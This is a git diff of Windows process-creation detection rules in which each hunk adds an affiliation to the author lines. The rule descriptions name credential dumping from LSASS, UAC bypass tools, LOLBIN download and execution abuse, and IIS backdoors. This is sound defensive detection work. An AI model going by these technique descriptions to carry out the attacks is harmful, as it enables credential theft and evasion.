+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/09/29
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/process_creation/proc_creation_win_hktl_createminidump.yml b/rules/windows/process_creation/proc_creation_win_hktl_createminidump.yml
index 890f00356..7564f3632 100644
--- a/rules/windows/process_creation/proc_creation_win_hktl_createminidump.yml
+++ b/rules/windows/process_creation/proc_creation_win_hktl_createminidump.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine
 references:
 - https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2019/12/22
 modified: 2023/01/30
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml b/rules/windows/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml
index 8d155ceb9..68fbf4965 100644
--- a/rules/windows/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml
+++ b/rules/windows/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects execution of UACMe (a tool used for UAC bypass) via default PE metadata
 references:
 - https://github.com/hfiref0x/UACME
-author: Christian Burkard, Florian Roth
+author: Christian Burkard (Nextron Systems), Florian Roth
 date: 2021/08/30
 modified: 2022/11/19
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_hwp_exploits.yml b/rules/windows/process_creation/proc_creation_win_hwp_exploits.yml
index ceb138e15..6f0cf758d 100644
--- a/rules/windows/process_creation/proc_creation_win_hwp_exploits.yml
+++ b/rules/windows/process_creation/proc_creation_win_hwp_exploits.yml
@@ -8,7 +8,7 @@ references:
 - https://twitter.com/cyberwar_15/status/1187287262054076416
 - https://blog.alyac.co.kr/1901
 - https://en.wikipedia.org/wiki/Hangul_(word_processor)
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2019/10/24
 modified: 2021/11/27
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_iis_appcmd_susp_module_install.yml b/rules/windows/process_creation/proc_creation_win_iis_appcmd_susp_module_install.yml
index 600d014e2..4ecc364dd 100644
--- a/rules/windows/process_creation/proc_creation_win_iis_appcmd_susp_module_install.yml
+++ b/rules/windows/process_creation/proc_creation_win_iis_appcmd_susp_module_install.yml
@@ -5,7 +5,7 @@ description: Detects suspicious IIS native-code module installations via command
 references:
 - https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/
 - https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2019/12/11
 modified: 2023/01/22
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_iis_appcmd_susp_rewrite_rule.yml b/rules/windows/process_creation/proc_creation_win_iis_appcmd_susp_rewrite_rule.yml
index dd61d5638..b1c60e9fc 100644
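Review bot: In the proc_creation_win_hktl_uacme_uac_bypass.yml hunk the new author line tags only the first name, `author: Christian Burkard (Nextron Systems), Florian Roth`, while every other Florian Roth entry in this patch receives the same suffix. Unless that omission is deliberate, the line should read `author: Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)` so the affiliation tag stays consistent across the rule set. The same check is worth running over the remaining multi-author lines in the patch, since those are the ones a search-and-replace on the single-name form misses.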
--- a/rules/windows/process_creation/proc_creation_win_iis_appcmd_susp_rewrite_rule.yml
+++ b/rules/windows/process_creation/proc_creation_win_iis_appcmd_susp_rewrite_rule.yml
@@ -5,7 +5,7 @@ description: Detects usage of "appcmd" to create new global URL rewrite rules. T
 references:
 - https://twitter.com/malmoeb/status/1616702107242971144
 - https://learn.microsoft.com/en-us/answers/questions/739120/how-to-add-re-write-global-rule-with-action-type-r
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2023/01/22
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/process_creation/proc_creation_win_imaging_devices_unusual_parents.yml b/rules/windows/process_creation/proc_creation_win_imaging_devices_unusual_parents.yml
index 74d077010..d99330805 100644
--- a/rules/windows/process_creation/proc_creation_win_imaging_devices_unusual_parents.yml
+++ b/rules/windows/process_creation/proc_creation_win_imaging_devices_unusual_parents.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity
 references:
 - https://thedfirreport.com/2022/09/26/bumblebee-round-two/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/09/27
 modified: 2022/12/29
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_impacket_compiled_tools.yml b/rules/windows/process_creation/proc_creation_win_impacket_compiled_tools.yml
index f429f0eb8..9f76c3c05 100644
--- a/rules/windows/process_creation/proc_creation_win_impacket_compiled_tools.yml
+++ b/rules/windows/process_creation/proc_creation_win_impacket_compiled_tools.yml
@@ -4,7 +4,7 @@ status: test description: Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives) references: - https://github.com/ropnop/impacket_static_binaries/releases/tag/0.9.21-dev-binaries -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/07/24 modified: 2022/10/09 tags: diff --git a/rules/windows/process_creation/proc_creation_win_import_cert_susp_locations.yml b/rules/windows/process_creation/proc_creation_win_import_cert_susp_locations.yml index 38c0bba81..dd3d5918a 100644 --- a/rules/windows/process_creation/proc_creation_win_import_cert_susp_locations.yml +++ b/rules/windows/process_creation/proc_creation_win_import_cert_susp_locations.yml @@ -5,7 +5,7 @@ description: Adversaries may install a root certificate on a compromised system references: - https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/ - https://docs.microsoft.com/en-us/powershell/module/pki/import-certificate?view=windowsserver2022-ps -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/09/09 modified: 2023/01/16 tags: diff --git a/rules/windows/process_creation/proc_creation_win_import_module_susp_dirs.yml b/rules/windows/process_creation/proc_creation_win_import_module_susp_dirs.yml index 070937e04..b7d5035eb 100644 --- a/rules/windows/process_creation/proc_creation_win_import_module_susp_dirs.yml +++ b/rules/windows/process_creation/proc_creation_win_import_module_susp_dirs.yml @@ -7,7 +7,7 @@ status: experimental description: Detects powershell scripts that import modules from suspicious directories references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2023/01/10 tags: - attack.execution 
diff --git a/rules/windows/process_creation/proc_creation_win_inline_base64_mz_header.yml b/rules/windows/process_creation/proc_creation_win_inline_base64_mz_header.yml index 67599593f..f480e27f7 100644 --- a/rules/windows/process_creation/proc_creation_win_inline_base64_mz_header.yml +++ b/rules/windows/process_creation/proc_creation_win_inline_base64_mz_header.yml @@ -4,7 +4,7 @@ status: experimental description: Detects encoded base64 MZ header in the commandline references: - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/07/12 tags: - attack.execution diff --git a/rules/windows/process_creation/proc_creation_win_inline_win_api_access.yml b/rules/windows/process_creation/proc_creation_win_inline_win_api_access.yml index 97bbbe675..5a4e980a1 100644 --- a/rules/windows/process_creation/proc_creation_win_inline_win_api_access.yml +++ b/rules/windows/process_creation/proc_creation_win_inline_win_api_access.yml @@ -7,7 +7,7 @@ status: experimental description: Detects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec references: - https://twitter.com/m417z/status/1566674631788007425 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/09/06 modified: 2023/01/09 tags: diff --git a/rules/windows/process_creation/proc_creation_win_install_reg_debugger_backdoor.yml b/rules/windows/process_creation/proc_creation_win_install_reg_debugger_backdoor.yml index 5600e4a61..95d4083ac 100644 --- a/rules/windows/process_creation/proc_creation_win_install_reg_debugger_backdoor.yml +++ b/rules/windows/process_creation/proc_creation_win_install_reg_debugger_backdoor.yml 
@@ -5,7 +5,7 @@ description: Detects the registration of a debugger for a program that is availa references: - https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/ - https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/ -author: Florian Roth, oscd.community, Jonhnathan Ribeiro +author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro date: 2019/09/06 modified: 2022/08/06 tags: diff --git a/rules/windows/process_creation/proc_creation_win_iox.yml b/rules/windows/process_creation/proc_creation_win_iox.yml index 8123bb841..d536f67ca 100644 --- a/rules/windows/process_creation/proc_creation_win_iox.yml +++ b/rules/windows/process_creation/proc_creation_win_iox.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the use of IOX - a tool for port forwarding and intranet proxy purposes references: - https://github.com/EddieIvan01/iox -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/10/08 tags: - attack.command_and_control diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml b/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml index c1b604018..f801194c0 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml @@ -6,7 +6,7 @@ references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Adplus/ - https://twitter.com/nas_bench/status/1534916659676422152 - https://twitter.com/nas_bench/status/1534915321856917506 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/06/09 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor.yml b/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor.yml index e75be25e3..dba1ce0a0 100644 
--- a/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor.yml @@ -5,7 +5,7 @@ related: type: similar status: experimental description: Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy "Bypass" or any binary named "powershell.exe" located in the path provided by 6th postiional argument -author: Nasreddine Bencherchali, memory-shards +author: Nasreddine Bencherchali (Nextron Systems), memory-shards references: - https://twitter.com/lefterispan/status/1286259016436514816 - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/ diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor_susp_usage.yml b/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor_susp_usage.yml index ecf092fb9..f6e3ec2e0 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor_susp_usage.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor_susp_usage.yml @@ -5,7 +5,7 @@ related: type: similar status: experimental description: Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy "Bypass" or any binary named "powershell.exe" located in the path provided by 6th postiional argument -author: Nasreddine Bencherchali, memory-shards +author: Nasreddine Bencherchali (Nextron Systems), memory-shards references: - https://twitter.com/lefterispan/status/1286259016436514816 - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/ diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_certoc_download.yml b/rules/windows/process_creation/proc_creation_win_lolbin_certoc_download.yml index 989edb461..8b1f26667 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_certoc_download.yml 
+++ b/rules/windows/process_creation/proc_creation_win_lolbin_certoc_download.yml @@ -4,7 +4,7 @@ status: experimental description: Detects when a user downloads file by using CertOC.exe references: - https://lolbas-project.github.io/lolbas/Binaries/Certoc/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/05/16 tags: - attack.command_and_control diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_customshellhost.yml b/rules/windows/process_creation/proc_creation_win_lolbin_customshellhost.yml index ea7071e42..7a44c92ca 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_customshellhost.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_customshellhost.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the execution of CustomShellHost binary where the child isn't located in 'C:\Windows\explorer.exe' references: - https://github.com/LOLBAS-Project/LOLBAS/pull/180 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/19 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_device_credential_deployment.yml b/rules/windows/process_creation/proc_creation_win_lolbin_device_credential_deployment.yml index f88d541c3..f0b77c4b1 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_device_credential_deployment.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_device_credential_deployment.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the execution of DeviceCredentialDeployment to hide a process from view references: - https://github.com/LOLBAS-Project/LOLBAS/pull/147 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/19 tags: - attack.defense_evasion 
diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml b/rules/windows/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml index c5fc08317..d034c69f9 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml @@ -5,7 +5,7 @@ description: Detects the execution of Xwizard tool from the non-default director references: - https://lolbas-project.github.io/lolbas/Binaries/Xwizard/ - http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/ -author: Christian Burkard +author: Christian Burkard (Nextron Systems) date: 2021/09/20 modified: 2022/10/09 tags: diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_execution_via_winget.yml b/rules/windows/process_creation/proc_creation_win_lolbin_execution_via_winget.yml index 884abf69a..cfd524397 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_execution_via_winget.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_execution_via_winget.yml @@ -5,7 +5,7 @@ description: Detects usage of winget to install applications via manifest file. references: - https://docs.microsoft.com/en-us/windows/package-manager/winget/install#local-install - https://lolbas-project.github.io/lolbas/Binaries/Winget/ -author: Sreeman, Florian Roth, Frack113 +author: Sreeman, Florian Roth (Nextron Systems), Frack113 date: 2020/04/21 modified: 2023/01/03 tags: diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_forfiles.yml b/rules/windows/process_creation/proc_creation_win_lolbin_forfiles.yml index ff672f2cb..cbf0a6958 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_forfiles.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_forfiles.yml 
@@ -10,7 +10,7 @@ description: Execute commands and binaries from the context of "forfiles". This references: - https://lolbas-project.github.io/lolbas/Binaries/Forfiles/ - https://pentestlab.blog/2020/07/06/indirect-command-execution/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/06/14 tags: - attack.execution diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_ieexec_download.yml b/rules/windows/process_creation/proc_creation_win_lolbin_ieexec_download.yml index ee2bf03be..4a61856b4 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_ieexec_download.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_ieexec_download.yml @@ -4,7 +4,7 @@ status: experimental description: Detects execution of the IEExec utility to download payloads references: - https://lolbas-project.github.io/lolbas/Binaries/Ieexec/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/05/16 logsource: category: process_creation diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_installutil_download.yml b/rules/windows/process_creation/proc_creation_win_lolbin_installutil_download.yml index 7b5727d43..9d6242e3b 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_installutil_download.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_installutil_download.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the use the .NET InstallUtil.exe application in order to download arbitrary files. The files will be written to %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\ references: - https://github.com/LOLBAS-Project/LOLBAS/pull/239 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/19 tags: - attack.defense_evasion 
diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_kavremover.yml b/rules/windows/process_creation/proc_creation_win_lolbin_kavremover.yml index e522c5edd..9766a3642 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_kavremover.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_kavremover.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries. references: - https://nasbench.medium.com/lolbined-using-kaspersky-endpoint-security-kes-installer-to-execute-arbitrary-commands-1c999f1b7fea -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/11/01 logsource: product: windows diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_launch_vsdevshell.yml b/rules/windows/process_creation/proc_creation_win_lolbin_launch_vsdevshell.yml index b5772c0a8..8e0d85e55 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_launch_vsdevshell.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_launch_vsdevshell.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands. references: - https://twitter.com/nas_bench/status/1535981653239255040 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/19 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_mftrace.yml b/rules/windows/process_creation/proc_creation_win_lolbin_mftrace.yml index 2a869aa77..5cb82525a 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_mftrace.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_mftrace.yml 
@@ -4,7 +4,7 @@ status: experimental description: The "Trace log generation tool for Media Foundation Tools" (Mftrace.exe) can be used to execute arbitrary binaries references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mftrace/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/06/09 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml b/rules/windows/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml index 60576f664..d38d10777 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml @@ -4,7 +4,7 @@ status: experimental description: Detects execution of "msdt.exe" using an answer file which is simulating the legitimate way of calling msdt via "pcwrun.exe" (For example from the compatibility tab) references: - https://lolbas-project.github.io/lolbas/Binaries/Msdt/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/06/13 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_msohtmed_download.yml b/rules/windows/process_creation/proc_creation_win_lolbin_msohtmed_download.yml index f26e7afc4..76e3bc775 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_msohtmed_download.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_msohtmed_download.yml @@ -4,7 +4,7 @@ status: experimental description: Detects usage of "MSOHTMED" to download arbitrary files references: - https://github.com/LOLBAS-Project/LOLBAS/pull/238/files -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/19 tags: - attack.defense_evasion 
diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_mspub_download.yml b/rules/windows/process_creation/proc_creation_win_lolbin_mspub_download.yml index 1b7582afb..480d841e0 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_mspub_download.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_mspub_download.yml @@ -4,7 +4,7 @@ status: experimental description: Detects usage of "MSPUB" (Microsoft Publisher) to download arbitrary files references: - https://github.com/LOLBAS-Project/LOLBAS/pull/238/files -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/19 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_openconsole.yml b/rules/windows/process_creation/proc_creation_win_lolbin_openconsole.yml index c4e5d085c..9926bf08c 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_openconsole.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_openconsole.yml @@ -4,7 +4,7 @@ status: experimental description: Detects usage of OpenConsole binary as a LOLBIN to launch other binaries to bypass application Whitelisting references: - https://twitter.com/nas_bench/status/1537563834478645252 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/06/16 tags: - attack.execution diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_pcalua.yml b/rules/windows/process_creation/proc_creation_win_lolbin_pcalua.yml index 2a068f1fb..c4cee55c9 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_pcalua.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_pcalua.yml 
@@ -8,7 +8,7 @@ description: Detects execition of commands and binaries from the context of The references: - https://lolbas-project.github.io/lolbas/Binaries/Pcalua/ - https://pentestlab.blog/2020/07/06/indirect-command-execution/ -author: Nasreddine Bencherchali, E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community +author: Nasreddine Bencherchali (Nextron Systems), E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community date: 2022/06/14 modified: 2023/01/04 tags: diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml b/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml index 034d07b20..fd21e5f61 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml @@ -4,7 +4,7 @@ status: experimental description: Detects indirect command execution via Program Compatibility Assistant "pcwrun.exe" leveraging the follina (CVE-2022-30190) vulnerability references: - https://twitter.com/nas_bench/status/1535663791362519040 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/06/13 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost.yml b/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost.yml index 9cb9a4e7a..f33757f8b 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost.yml 
@@ -4,7 +4,7 @@ status: experimental description: Detects usage of "PresentationHost" which is a utility that runs ".xbap" (Browser Applications) files. It can be abused to run malicious ".xbap" files any bypass AWL references: - https://lolbas-project.github.io/lolbas/Binaries/Presentationhost/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/07/01 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost_download.yml b/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost_download.yml index 5612d3c05..bde34730f 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost_download.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost_download.yml @@ -4,7 +4,7 @@ status: experimental description: Detects usage of "PresentationHost" which is a utility that runs ".xbap" (Browser Applications) files to download arbitrary files references: - https://github.com/LOLBAS-Project/LOLBAS/pull/239/files -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/19 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml b/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml index f2ebfb000..d797d2b56 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml @@ -6,7 +6,7 @@ references: - https://www.fortiguard.com/threat-signal-report/4718?s=09 - https://lolbas-project.github.io/lolbas/Binaries/Regasm/ - https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/25 tags: - attack.defense_evasion 
diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_register_app.yml b/rules/windows/process_creation/proc_creation_win_lolbin_register_app.yml index b1c2b8b64..868019cd7 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_register_app.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_register_app.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application. references: - https://twitter.com/sblmsrsn/status/1456613494783160325?s=20 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/19 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_scriptrunner.yml b/rules/windows/process_creation/proc_creation_win_lolbin_scriptrunner.yml index a6b99319e..01a477d22 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_scriptrunner.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_scriptrunner.yml @@ -4,7 +4,7 @@ status: experimental description: The "ScriptRunner.exe" binary can be abused to proxy execution through it and bypass possible whitelisting references: - https://lolbas-project.github.io/lolbas/Binaries/Scriptrunner/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/07/01 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_sftp.yml b/rules/windows/process_creation/proc_creation_win_lolbin_sftp.yml index da01b4d34..e39089e6b 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_sftp.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_sftp.yml 
@@ -4,7 +4,7 @@ status: experimental description: Detects the usage of the "sftp.exe" binary as a LOLBIN by abusing the "-D" flag references: - https://github.com/LOLBAS-Project/LOLBAS/pull/264 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/11/10 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_sideload_link_binary.yml b/rules/windows/process_creation/proc_creation_win_lolbin_sideload_link_binary.yml index fa924f846..1561da279 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_sideload_link_binary.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_sideload_link_binary.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the execution utitilies often found in Visual Studio tools that hardcode the call to the binary "link.exe". They can be abused to sideload any binary with the same name references: - https://twitter.com/0gtweet/status/1560732860935729152 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/22 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_sigverif.yml b/rules/windows/process_creation/proc_creation_win_lolbin_sigverif.yml index 92e76a9dd..9ee5ec13b 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_sigverif.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_sigverif.yml @@ -5,7 +5,7 @@ description: Detects the execution of sigverif binary as a parent process which references: - https://www.hexacorn.com/blog/2018/04/27/i-shot-the-sigverif-exe-the-gui-based-lolbin/ - https://twitter.com/0gtweet/status/1457676633809330184 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/19 tags: - attack.defense_evasion 
diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml b/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml index 1bffb4176..411f86556 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml @@ -7,7 +7,7 @@ status: experimental description: The "Squirrel.exe" binary that is part of multiple software (Slack, Teams, Discord...etc) can be used as a LOLBIN references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/06/09 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml b/rules/windows/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml index 2b4fc992b..83513b37d 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml @@ -6,7 +6,7 @@ references: - https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340 - https://twitter.com/bohops/status/1477717351017680899?s=12 - https://lolbas-project.github.io/lolbas/OtherMSBinaries/AccCheckConsole/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/01/06 tags: - attack.execution diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml b/rules/windows/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml index 1d262ba20..42d1a532d 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml +++ 